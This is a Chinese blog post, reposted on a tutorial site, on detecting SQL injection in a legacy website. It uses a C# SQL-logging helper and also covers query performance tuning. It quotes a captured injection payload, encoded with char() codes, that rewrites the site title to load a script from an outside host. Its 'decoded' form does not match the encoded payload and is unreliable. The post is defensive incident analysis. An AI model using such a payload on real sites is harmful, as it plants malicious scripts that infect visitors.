记一次成功的sql注入入侵检测附带sql性能优化-Mysql Tutorial-php.cn

Home

Database

Mysql Tutorial

记一次成功的sql注入入侵检测附带sql性能优化

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 06:02 PM

sql injectionIntrusion detection

很多同学和园友都遇到过sql注入的，其中大部分都是代码的不严谨造成的，都是犯过很多错误才学会认真起来

但是如果是让你接手一个二等残废的网站，并让你在上面改版，而且不能推翻式改版，只能逐步替换旧的程序，那么你会非常痛苦，例如我遇到的问题：
问题1.
老板对你说，以前刚做完网站好好了，没有出现木马，怎么你来了，就会出现木马，先别说了，赶紧解决问题，我彻底无语，但是如果争吵，其实证明你和老板一样无知，拿出证据和事实分析来让公司其他稍微懂技术的一起来证明，公司网站被挂马不是你来了的错。
如是我通过网站目录仔细排查将通过fck上传的网马删除并修补fck的上传漏洞并记下了这篇 Fckeditor使用笔记，其实很多人都遇到过，也解决过，都是小问题，但是让你老板明白比解决漏洞问题更蛋疼，我那解释的叫一个汗啊，恨不得把公司所有稍微懂点技术的都叫上让他们看什么是大马什么是小马，然后演示怎么上传木马，奶奶的，教程普及啊。
问题2.
网站又出现问题，上次的问题解决了不过两个月，网站又被入侵挂马，如是老板这次再说因为我来了才出问题，立马走人，这就是为什么不能更不懂技术的人硬碰硬，更不能和你的老板来说，说了你又不懂。
但是要命的是网站是以前的技术开发的二等残废，在别个的cms上修改的，我必须保证网站在的开发的同时旧的模块还可以使用，通过逐步更新的方法将网站底层翻新，但是那么多页面，你很难一个一个去检测那个页面有漏洞，如是写出下面的检测代码，没想到这么简单的就搞定了，并且可以通过此方法优化你的sql。
第一步建立一个sql日志表
代码如下:
CREATE TABLE [dbo].[my_sqllog](
[id] [bigint] IDENTITY(1,1) NOT NULL,
[hit] [bigint] NULL,
[sqltext] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[paramdetails] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[begintime] [datetime] NULL,
[endtime] [datetime] NULL,
[fromurl] [varchar](max) COLLATE Chinese_PRC_CI_AS NULL,
[ip] [varchar](20) COLLATE Chinese_PRC_CI_AS NULL,
[lastelapsedtime] [bigint] NULL,
CONSTRAINT [PK_my_sqllog] PRIMARY KEY CLUSTERED
(
[id] ASC
)WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]

记录sql语句、此sql语句被执行次数，参数及值，记录开始时间，结束时间，来自哪个页面，ip和此条语句执行时间(暂时没用)
第二步在sqlhelper里写记录代码
两个方法本来可以写成private的，但是此二等残废的网站其他地方用的别的sqlhelper类，就直接调用此处通过合理优化的sqlhelper类的方法了。
代码1：插入日志
代码如下:
public static int ExecuteSqlLog(CommandType commandType, string commandText, params DbParameter[] cmdParams)
{
#region 参数处理
string colums = "";
string dbtypes = "";
string values = "";
string paramdetails = "";
if (cmdParams != null && cmdParams.Length > 0)
{
foreach (DbParameter param in cmdParams)
{
if (param == null)
{
continue;
}
colums += param.ParameterName + " ";
dbtypes += param.DbType + " ";
values += param.Value + "；";
}
paramdetails = string.Format(" {0},{1},{2}", colums, dbtypes, values);
}
string fromurl = "";
if (System.Web.HttpContext.Current!=null)
{
fromurl = System.Web.HttpContext.Current.Request.Url.ToString();
}
// commandText = commandText.Replace("'","‘").Replace(";","；");
SqlParameter[] parameters = new SqlParameter[]
{
new SqlParameter("@hit",1),
new SqlParameter("@sqltext",commandText),
new SqlParameter("@paramdetails",paramdetails),
new SqlParameter("@begintime",DateTime.Now),
new SqlParameter("@endtime",DateTime.Now),
new SqlParameter("@fromurl",fromurl),
new SqlParameter("@ip",Web.PressRequest.GetIP()),
new SqlParameter("@lastelapsedtime",0),
};
#endregion
using (DbConnection connection = Factory.CreateConnection())
{
connection.ConnectionString = GetRealConnectionString(commandText);//ConnectionString;
string sql = "";
// 执行DbCommand命令,并返回结果.
int id =
Utils.TypeConverter.ObjectToInt(ExecuteScalarLog(CommandType.Text,
"select top 1 id from my_sqllog where sqltext=@sqltext",
new SqlParameter("@sqltext", commandText)));
if (id > 0)
{
sql = "update my_sqllog set hit=hit+1,ip=@ip,endtime=@endtime,fromurl=@fromurl where id=" + id;
}
else
{
sql = "insert into my_sqllog(hit,sqltext,paramdetails,begintime,endtime,fromurl,ip,lastelapsedtime) values(@hit,@sqltext,@paramdetails,@begintime,@endtime,@fromurl,@ip,@lastelapsedtime)";
}
// 创建DbCommand命令,并进行预处理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, sql, parameters, out mustCloseConnection);
// 执行DbCommand命令,并返回结果.
int retval = cmd.ExecuteNonQuery();
// 清除参数,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

代码2：判断此条sql是否存在
代码如下:
private static object ExecuteScalarLog( CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (ConnectionString == null || ConnectionString.Length == 0) throw new ArgumentNullException("ConnectionString");
// 创建并打开数据库连接对象,操作完成释放对象.
using (DbConnection connection = Factory.CreateConnection())
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 创建DbCommand命令,并进行预处理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
// 执行DbCommand命令,并返回结果.
object retval = cmd.ExecuteScalar();
// 清除参数,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}
}

第三部在你的每个执行sql语句的方法里加入以下代码，不管是ExecuteScalar、ExecuteReader还是ExecuteNonQuery等等都加上
代码如下:
//执行sql之前进行日志记录操纵
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);

代码示例:
代码如下:
public static object ExecuteScalar(DbConnection connection, CommandType commandType, string commandText, params DbParameter[] commandParameters)
{
if (connection == null) throw new ArgumentNullException("connection");
//connection.Close();
connection.ConnectionString = GetRealConnectionString(commandText);
connection.Open();
// 创建DbCommand命令,并进行预处理
DbCommand cmd = Factory.CreateCommand();
bool mustCloseConnection = false;
PrepareCommand(cmd, connection, (DbTransaction)null, commandType, commandText, commandParameters, out mustCloseConnection);
//执行sql之前进行日志记录操纵
int log = ExecuteSqlLog(CommandType.Text, commandText, commandParameters);
// 执行DbCommand命令,并返回结果.
object retval = cmd.ExecuteScalar();
// 清除参数,以便再次使用.
cmd.Parameters.Clear();
if (mustCloseConnection)
connection.Close();
return retval;
}

然后你会发现入侵的入口被记录下来了，后面方框里的就是构造注入的sql

构造sql如下：

39191+update+my_websetting+set+websitetitle=REPLACE(cast(websitetitle+as+varchar(8000)),cast(char(60)+char(47)+char(116)+char(105)+char(116)+char(108)+char(101)+char(62)+char(60)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(32)+char(115)+char(114)+char(99)+char(61)+char(104)+char(116)+char(116)+char(112)+char(58)+char(47)+char(47)+char(100)+char(102)+char(114)+char(103)+char(99)+char(99)+char(46)+char(99)+char(111)+char(109)+char(47)+char(117)+char(114)+char(46)+char(112)+char(104)+char(112)+char(62)+char(60)+char(47)+char(115)+char(99)+char(114)+char(105)+char(112)+char(116)+char(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))--
转码后变成这样了：　　

update my_websetting set websitetitle=REPLACE(cast(websitetitle as varchar(8000)),websitetitle+'')
这个就是木马地址，没事你就别点了，好奇害死猫。

小结：
既然知道入口就知道怎么补救了吧，把string类型该过滤的都过滤掉，int类型的就得是int类型，别让数据库替你隐式转。通过此sql日志记录，你应该发现一点那个hit还是有点价值的。
通过select top 100 * from my_sqllog order by hit desc
你会发现你写的那么多sql原来真垃圾，在条件允许的情况下干嘛不把它放到缓存里。所以后来我写的sql基本不在这top 100里。
抛砖引玉，望高手批评，以上入侵方法希望刚学习做程序员的同学不要用来欺负小网站，伤不起。
作者：jqbird

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

如何通过Python进行网络流量监控与入侵检测Jun 29, 2023 pm 04:35 PM

如何通过Python进行网络流量监控与入侵检测网络安全在当今信息时代是一项重要的任务。对于企业和个人而言，及时发现并应对网络入侵是至关重要的。而网络流量监控与入侵检测是一种常见且有效的安全防御手段。本文将介绍如何利用Python编程语言来实现网络流量监控与入侵检测。一、网络流量监控的基本概念网络流量监控是指对网络中的数据流进行实时监测和记录的过程。通过监控网

如何使用exp进行SQL报错注入May 12, 2023 am 10:16 AM

0x01前言概述小编又在MySQL中发现了一个Double型数据溢出。当我们拿到MySQL里的函数时，小编比较感兴趣的是其中的数学函数，它们也应该包含一些数据类型来保存数值。所以小编就跑去测试看哪些函数会出现溢出错误。然后小编发现，当传递一个大于709的值时，函数exp()就会引起一个溢出错误。mysql>selectexp(709);+-----------------------+|exp(709)|+-----------------------+|8.218407461554972

Nginx基础安全知识：防范SQL注入攻击Jun 10, 2023 pm 12:31 PM

Nginx是一个快速、高性能、可扩展的Web服务器，它的安全性是Web应用程序开发中不可忽略的问题。尤其是SQL注入攻击，它可以对Web应用程序造成巨大的破坏。在本篇文章中，我们将讨论如何使用Nginx来防范SQL注入攻击，以保护Web应用程序的安全。什么是SQL注入攻击？SQL注入攻击是一种利用Web应用程序漏洞的攻击方式。攻击者会在Web应用程序中注入恶

PHP编程技巧：如何防止SQL注入攻击Aug 17, 2023 pm 01:49 PM

PHP编程技巧：如何防止SQL注入攻击在进行数据库操作时，安全是至关重要的。SQL注入攻击是一种常见的网络攻击，它利用了应用程序对用户输入的不正确处理，从而导致恶意的SQL代码被插入并执行。为了保护应用程序免受SQL注入攻击的影响，我们需要采取一些防范措施。使用参数化查询参数化查询是最基本也是最有效的防范SQL注入攻击的方法。它通过将用户输入的值与SQL查询

PHP SQL注入漏洞的检测和修复Aug 08, 2023 pm 02:04 PM

PHPSQL注入漏洞的检测和修复概述：SQL注入是指攻击者利用Web应用程序对输入进行恶意注入SQL代码的一种攻击方式。PHP作为一种广泛应用于Web开发的脚本语言，被广泛用于开发动态网站和应用程序。然而，由于PHP的灵活性和易用性，开发者常常忽略了安全性，导致了SQL注入漏洞的存在。本文将介绍如何检测和修复PHP中的SQL注入漏洞，并提供相关代码示例。检

Laravel开发注意事项：防止SQL注入的方法与技巧Nov 22, 2023 pm 04:56 PM

Laravel开发注意事项：防止SQL注入的方法与技巧随着互联网的发展和计算机技术的不断进步，Web应用程序的开发也变得越来越普遍。在开发过程中，安全性一直是开发者不可忽视的重要问题。其中，防止SQL注入攻击是开发过程中需要特别关注的安全问题之一。本文将介绍几种Laravel开发中常用的方法和技巧，帮助开发者有效地防止SQL注入。使用参数绑定参数绑定是Lar

如何使用PHP防止SQL注入攻击Jun 24, 2023 am 10:31 AM

在网络安全领域里，SQL注入攻击是一种常见的攻击方式。它利用恶意用户提交的恶意代码来改变应用程序的行为以执行不安全的操作。常见的SQL注入攻击包括查询操作、插入操作和删除操作。其中，查询操作是最常被攻击的一种，而防止SQL注入攻击的一个常用的方法是使用PHP。PHP是一种常用的服务器端脚本语言，它在web应用程序中的使用非常广泛。PHP可以与MySQL等关系

PHP表单过滤：SQL注入防范与过滤Aug 07, 2023 pm 03:49 PM

PHP表单过滤：SQL注入防范与过滤引言：随着互联网的快速发展，Web应用程序的开发变得越来越普遍。在Web开发中，表单是最常见的用户交互方式之一。然而，表单提交数据的处理过程中存在着安全风险。其中，最常见的风险之一就是SQL注入攻击。SQL注入攻击是一种利用Web应用程序对用户输入数据进行处理不当而导致攻击者能够执行非授权数据库查询的攻击方式。攻击者通过在

See all articles